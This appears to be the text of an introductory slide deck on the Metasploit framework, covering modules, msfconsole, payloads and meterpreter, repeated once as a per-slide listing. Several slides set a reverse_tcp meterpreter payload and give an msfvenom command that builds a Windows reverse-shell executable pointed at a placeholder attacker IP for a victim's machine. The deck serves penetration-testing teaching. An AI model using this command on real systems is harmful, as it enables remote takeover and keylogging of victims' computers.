Metasploit
Metasploit
• Metasploit is an open source, freely available
framework that is used by professionals.
• For vulnerability scanning & penetration testing.
• Development of exploits, Payloads.
Why Metasploit ?
• It provides the end to end framework for
penetration testing
• Information gathering
• Vulnerability scanning
• Pre & post Exploitation
• Exploit Development
METASPLOIT ARCHITECTURE
MODULES AND LOCATIONS
Exploits
•Defined as modules that use payloads
•An exploit without a payload is an Auxiliary module
Payloads, Encoders, Nops
•Payloads consist of code that runs remotely
•Encoders ensure that payloads make it to their destination
•Nops keep the payload sizes consistent
Primary ModuleTree
•Located under /usr/share/metasploit-framework/modules/
Vulnerability
The word vulnerability, in computer security, refers
to a weakness in a system allowing an attacker to
violate the confidentiality, integrity, availability
EXPLOIT =Vulnerability + Payload;
MSF Console
• The msfconsole is probably the most
popular interface to the Metasploit
Framework (MSF). It provides an “allin-one”
centralized console and allows you efficient
access to virtually all of the options
available in the MSF.
• To find the vulnerabilities like open ports,
reverse tcp ports.
MSF console
MSF options
Setting LHOST & LPORT
Set payload
• Set payload windows/meterpreter/reverse_tcp
• Meterpreter and shell
• The meterpreter is simply an advanced payload(stages)
included in the metasploit framwork. It is an extensible
payload with a lot of features, like it can be used for
key logging, getid, snapshots from remote desktop when
connected.
Exploiting Windows
• The concept of exploiting a vulnerability on Linux or
Windows OS remains same.
• For this we need “MSFVENOM” to generate an executable
with specific options and payload that can be executed in
victim’s system
• COMMAND
• Msfvenom -p windows/Meterpreter/reverse_shell
LHOST=<Attackers IP> LPORT = < Attackers port> -f exe
/usr/bin/shell.exe
• -p for specific payload used
• -f for which foemat using exe, pdf.
Meterpreter
ThankYou

Metasploit framework in Network Security

  • 1.
  • 2.
    Metasploit • Metasploit isan open source, freely available framework that is used by professionals. • For vulnerability scanning & penetration testing. • Development of exploits, Payloads.
  • 3.
    Why Metasploit ? •It provides the end to end framework for penetration testing • Information gathering • Vulnerability scanning • Pre & post Exploitation • Exploit Development
  • 4.
    METASPLOIT ARCHITECTURE MODULES ANDLOCATIONS Exploits •Defined as modules that use payloads •An exploit without a payload is an Auxiliary module Payloads, Encoders, Nops •Payloads consist of code that runs remotely •Encoders ensure that payloads make it to their destination •Nops keep the payload sizes consistent Primary ModuleTree •Located under /usr/share/metasploit-framework/modules/
  • 5.
    Vulnerability The word vulnerability,in computer security, refers to a weakness in a system allowing an attacker to violate the confidentiality, integrity, availability EXPLOIT =Vulnerability + Payload;
  • 6.
    MSF Console • Themsfconsole is probably the most popular interface to the Metasploit Framework (MSF). It provides an “allin-one” centralized console and allows you efficient access to virtually all of the options available in the MSF. • To find the vulnerabilities like open ports, reverse tcp ports.
  • 7.
  • 8.
  • 9.
  • 10.
    Set payload • Setpayload windows/meterpreter/reverse_tcp • Meterpreter and shell • The meterpreter is simply an advanced payload(stages) included in the metasploit framwork. It is an extensible payload with a lot of features, like it can be used for key logging, getid, snapshots from remote desktop when connected.
  • 11.
    Exploiting Windows • Theconcept of exploiting a vulnerability on Linux or Windows OS remains same. • For this we need “MSFVENOM” to generate an executable with specific options and payload that can be executed in victim’s system • COMMAND • Msfvenom -p windows/Meterpreter/reverse_shell LHOST=<Attackers IP> LPORT = < Attackers port> -f exe /usr/bin/shell.exe • -p for specific payload used • -f for which foemat using exe, pdf.
  • 12.
  • 13.